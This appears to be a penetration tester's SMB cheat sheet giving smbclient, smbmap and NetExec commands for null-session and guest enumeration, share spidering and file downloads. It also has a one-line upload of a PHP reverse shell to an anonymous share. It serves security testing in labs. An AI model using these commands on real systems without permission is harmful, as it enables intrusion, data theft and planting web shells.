
SMB

Server Message Block - Ports 445/139


If you see microsoft-ds on a port scan, it means the service is SMB.

smbclient
List resources
smbclient -L <IP>
Version Detection
smbclient -L //<target> -N
List Null session
smbclient -N <IP>
List User Share
smbclient //IP/<SHARE> -U <USER>
Connect to share
smbclient -N \\\\IP\\Share
Without Credentials
smbclient --no-pass //IP/<Share>
Resources list + Null session
smbclient -L \\10.10.10.123 -N
Upload PHP reverse shell
smbclient -N //10.10.10.123/Development -c 'put cmd.php tokyo.php'

Download a File

Type this sequence in the smbclient session:
recurse
prompt
mget *
smbmap
Connect to host
smbmap -H <IP>
Connect with credentials
smbmap -H <IP> -d <domain> -u '<user>' -p '<pass>'
List Share
smbmap -H <IP> -r <SHARE>
SAMBA
Download file
smbget -U <User> smb://IP/<SHARE_LOCATION> / --download
NetExec

Basic
nxc smb 10.129.230.148
Scan Users Using NULL session
nxc smb 10.129.230.148 -u '' -p '' --users
Scan Shares Using Guest User
nxc smb 10.129.230.148 -u guest -p '' --shares
Spider shares using existing credentials
nxc smb IP -u "user" -p 'password' --spider Share$ --pattern .
Download a file from a share
nxc smb IP -u "user" -p 'password' --share Share$ --get-file file.example myfilenow.example
NTLM Relay Attacks
SMBv1 Vulnerabilities

Major vulnerabilities
